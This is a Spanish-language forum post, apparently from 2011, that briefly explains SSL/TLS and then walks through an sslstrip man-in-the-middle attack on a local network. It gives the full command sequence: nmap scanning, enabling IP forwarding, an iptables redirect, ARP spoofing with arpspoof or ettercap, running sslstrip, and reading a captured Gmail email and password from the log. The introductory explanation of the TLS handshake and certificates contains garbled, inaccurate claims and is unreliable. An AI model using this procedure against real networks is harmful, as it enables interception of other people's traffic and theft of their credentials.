antes de entender que es sslstrip debes saber primero
¿que es SSL y TSL?
SSL significa Secure Sockets Layer, aunque IETF (Internet Engineering Task Force) le cambió el nombre a TLS (Transport Layer Security). Los términos SSL y TLS son a menudo utilizados indistintamente o en combinación (TLS / SSL), pero uno es de hecho, el predecesor del otro - SSL 3.0, sirvio de base para TLS 1.0, que,aveces se identifica como protocolo SSL 3.1.
Porque es usado SSL/TSL?
la criptografía es la base para los protocolos de seguridad más modernas. Cuando se establece una sesión SSL, el servidor se inicia mediante el envío de una clave pública encriptada para el cliente, por lo que ambas partes (y de cualquier espía) puede leer esta clave. Sin embargo, el cliente transmite un randomn 46 bytes (basado en PKCS) de los datos al servidor de una manera que nadie más podía descifrar. Sólo el servidor, con su clave privada, puede decodificar la información para determinar los 46 bytes originales. Este secreto compartido se utiliza ahora para generar un conjunto de claves de cifrado (basado en RC4 o ARC4) para cifrar el resto de la sesión.
Estas claves fueron incorporadas en los certificados de autenticación (los denominados certificados X.509) que permitie a un servidor autenticar a un cliente,
nos preguntaremos.. bueno y esto a que viene si queremos saber es de sslstrip??
bueno yo tambien me pregunto lo mismo xD pero es algo vital si queremos usar esta herramienta correctamente.
SSLStrip creada por Moxie Marlinspike presentada en Black Hat DC 2009.
sslstrip es un script creado en python que permite realizar ataques MiTM (Man-in-The-Middle) convirtiendo todas las comunicaciones entre cliente y la herramienta sslstrip en comunicaciones sin SSL. Las funciones principales de la herramienta serían:
1. Hacer MiTM en las conexiones HTTP.
2. Reemplazar todos los enlaces HTTPS por enlaces HTTP.
3. Comunicarse con el cliente siempre por HTTP, incluso para las conexiones seguras.
4. Comunicarse con el servidor por HTTPS, para los mismos links seguros que hablamos antes.
5. Hacer transparente la comunicación tanto para el cliente como para el servidor.
6. Reemplazar imágenes como el favicon por imagenes que aporten confianza en la conexión al cliente.
7. Obtención de información sensible.
y que se necesita para hacer un MiTM con sslstrip?
vamos a atacar mi "red" local
necesitaremos identificar nuestra "victima"
sabiendo que nuestra ip es 192.168.0.100
y nuestra puerta de enlace es 192.168.0.1
utilizaremos nmap para saber que ip estan conectadas
escanearemos nuestra red
vemos nuestra ip y la ip de nuestra victima 192.168.0.102
vamos ahora hacer que nuestro equipo funcione como una puerta de enlace en nuestra red
abrimos una consola y escribimos
echo 1> /proc/sys/net/ipv4/ip_forward
lo que significa subir ip_forward, 0 es para bajar ip_forward por lo general esta como default
Redirigiremos todo el tráfico HTTP con iptables al puerto 8080 para que pase por sslstrip, tambien puede usar cualquier puerto, sslstrip usa el puerto 10000 como default
iptables -t nat -A PREROUTING -p tcp --destination-p 80 -j REDIRECT --to-p 8080
ahora pasamos a realizar el ataque ARP MiTM no explicare de a mucho que es un arp MiTM pero para resumir el ataque se basa en decirle a victima que la mac addres de mi equipo es el gateway // que resumen xD
podemos usar dos formas una es con arpspoof que seria de la siguiente forma
arpspoof -i {interfaz_red} -t {ip_victima} {ip_router}
o usando ettercap que es mi favorita
ettercap -i {interface_red} -T -q -M arp /{gateway}/ // // -P autoadd
ahora ejecutamos sslstrip
sslstrip -w nombre -a -l 8080 //el nombre es opcional
los datos se guardaran en sslstrip.log
si vemos del lado de la victima entramos a gmail y vemos que no entramos a travez de un protocolo seguro
[Enlace externo eliminado para invitados]
si vemos en el log buscamos un acceso a gmail veamos que encontramos
vemos que esta enviando por ssl nuestro acceso a gmail Email=frozenfew&Passwd=laclavees12345
ahora todo el trafico paso por sslstrip de esta forma
Cliente <---NoSSL----> SSLStrip <--SSL---> Servidor
bueno hasta aqui espero que les guste
saludos
pd: me gustaria hacerles un videito aunque ya lo hize pero pues tengo la conexion mas rapida del mundo ¬¬ y pues se conecta y se desconecta cada 7 segundos // comprobado // si puedo donde un amigo lo subire
dedicado a an0 xD
en el msn ♣Conejo escribió:[26/03/11 10:39:13] Su firma contiene 281 caracteres. El máximo número de caracteres permitidos es 200.
menos mal que soy admin